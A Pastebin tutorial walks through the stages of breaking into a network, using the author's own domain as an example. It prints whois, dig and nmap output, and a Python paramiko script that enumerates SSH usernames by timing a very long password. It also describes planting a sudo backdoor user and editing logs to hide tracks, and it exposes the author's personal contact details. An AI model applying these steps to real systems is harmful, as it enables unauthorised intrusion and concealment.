API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 24th, 2016
124
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.50 KB | None | 0 0
raw download clone embed print report
  1. A hacker can get his feet into a network via different techniques, and for different reasons. A network can be targeted from a hacker for what ever reason he has and in this case it will be a target of choice, or it could be just a target of opporunity as he found it by a random scan.
  2. -“If a network is not a target of choice it doesn't mean that it is safe, because its just a matter of time till it will become a target of opportunity.”-
  3.  
  4. Usually hackers will go in these well known steps to gain access over a network,
  5.  
  6. 1- Reconnaissance and Foot / Finger printing:- Mainly reconnaissance is the first step of an attack and this phase is mostly about Information gathering. All information that the hacker can gather about the victim even if it seems simple and useless. The hacker can collect this information via different ways, for example,simple dumpster diving around the target's office, checking their staff social network profiles, googling the target and note the information he will got or via Social engineering. The Foot printing process will come after to complete the step. Foot printing is mainly to study the network, for example, how devices are connected together, how many device the network have, infra structure, firewalls, etc.
  7. “This phase depend on OSINT -Open source intelligence- with no direct contact with the target”
  8.  
  9. 2- Scanning:- The attacker will engage within the target for more specific details, for example open ports and running services, lets say we got port 21 open then by a simple telnet command we can figure the FTP version running in the server.
  10.  
  11. 3-Enumeration, gaining access and privileges escalation:- Three different processes, firstly Enumeration which will allow the hacker to know the valid accounts that he wants to obtain access for via active connection, for example he knows for the above processes -Reconnaissance, foot printing and scanning- that there is a SSH service running on -default- port 22, via enumerating the hacker can know if a user is valid or not via simple python script. Next step will be reinforcing the valid account. If he succeed to gain an access to the SSH server, then he will try do privileges escalation, if the brute-forced account doesn't have super user power.
  12.  
  13. 4- Creating a backdoor and covering tracks:- In this phase the hacker already gained access and he will install a rootkit, backdoor so he guarantee him self a free entrance to the network later on, for example, creating a new user and adding it to the sudo list. Last step will be covering the tracks by updating the logs via deleting his tracks from it.
  14. A hacker will never delete the logs, as it will get the network administrator attention.
  15.  
  16.  
  17.  
  18.  
  19. A real life example,
  20.  
  21. Let's say a hacker would like to takeover ashellz.com -It's owned by me- I will try to demonstrate the process step by step according to the above explanation.
  22.  
  23. Reconnaissance and Foot printing:-
  24.  
  25. Using the command whois to collect public information about the target.
  26.  
  27.  
  28. root@Mox:/home/allamoox# whois ashellz.com
  29. Registrant domain : Goddady.com
  30. Tech Email: allamoox@hotmail.com
  31. Name Server: NS8015.HOSTGATOR.COM
  32. Name Server: NS8016.HOSTGATOR.COM
  33. Tech Name: mahmoud allam
  34. Tech Organization: aLLamoox
  35. Tech Street: aol tarik shobar
  36. Tech City: Tanta
  37. Tech State/Province: gHARBIA
  38. Tech Postal Code: 31111
  39. Tech Country: EG
  40. Tech Phone: +20.104691184
  41.  
  42.  
  43. root@Mox:/home/allamoox# dig ashellz.com any -Using dig with the switch any , to show all records.-
  44.  
  45. ashellz.com. 14385 IN A 192.185.16.67
  46. ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
  47. ashellz.com. 14385 IN MX 0 mail.ashellz.com.
  48. ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
  49. ashellz.com. 86385 IN NS ns8016.hostgator.com.
  50. ashellz.com. 86385 IN NS ns8015.hostgator.com.
  51.  
  52. Scanning:-
  53.  
  54. Will use nmap with switches O to detect the OS and sS so the connection close before completing the three way handshake -Passive scan-.
  55.  
  56. root@Mox:/home/allamoox# nmap -O -sS ashellz.com
  57. PORT STATE SERVICE
  58. 21/tcp open ftp
  59. 22/tcp filtered ssh
  60. 25/tcp filtered smtp
  61. 26/tcp open rsftp
  62. 53/tcp open domain
  63. 80/tcp open http
  64. 110/tcp open pop3
  65. 135/tcp filtered msrpc
  66. 139/tcp filtered netbios-ssn
  67. 143/tcp open imap
  68. 443/tcp open https
  69. 445/tcp filtered microsoft-ds
  70. 465/tcp open smtps
  71. 587/tcp open submission
  72. 993/tcp open imaps
  73. 995/tcp open pop3s
  74. 2222/tcp open EtherNetIP-1
  75. 3306/tcp open mysql
  76. 8080/tcp open http-proxy
  77. 8443/tcp open https-alt
  78. Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%)
  79. .
  80.  
  81. root@Mox:/home/allamoox# telnet private.ashellz.com 22
  82. Trying 158.69.197.45...
  83. Connected to private.ashellz.com.
  84. Escape character is '^]'.
  85. SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
  86.  
  87. Simple search will let us know that this
  88. Enumeration:-
  89.  
  90. The hacker at this point have a good idea about the target, and which parts are vulnerable and he will start enumerating valid accounts for the SSH service via timing attack technique.
  91.  
  92. The technique here depend in the time that our server take to authenticate a user, so we will use a 10kb password to which means if the user doesn't exist then we will get answer from the server faster than an existing user.
  93.  
  94. With this simple python script we will decide that our password is roughly 10KB and will enter the username we want manually.
  95.  
  96. #Including the paramiko library
  97. import paramiko
  98. #Including the time library
  99. import time
  100. #Asking for the required username to be checked
  101. user=raw_input("user: ")
  102. #Supplying the Password as the letter A repeated 25000 times
  103. p='A'*25000 -define password as letter A repeated 25000 times-
  104. ssh = paramiko.SSHClient()
  105. starttime=time.clock()
  106. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  107. try:
  108. #Opening a SSH connection with the ashellz.com server with the user that we will chose with the big #25000 letter password
  109. ssh.connect('192.185.16.67', username=user,
  110. password=p)
  111. #Giving the token time to authenticate an user
  112. except:
  113. endtime=time.clock()
  114. total=endtime-starttime
  115. print(total)
  117.  
  118. Now we get few valid accounts such as (root, allamoox, allam, test)
  119. |gaining access and privileges escalation
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!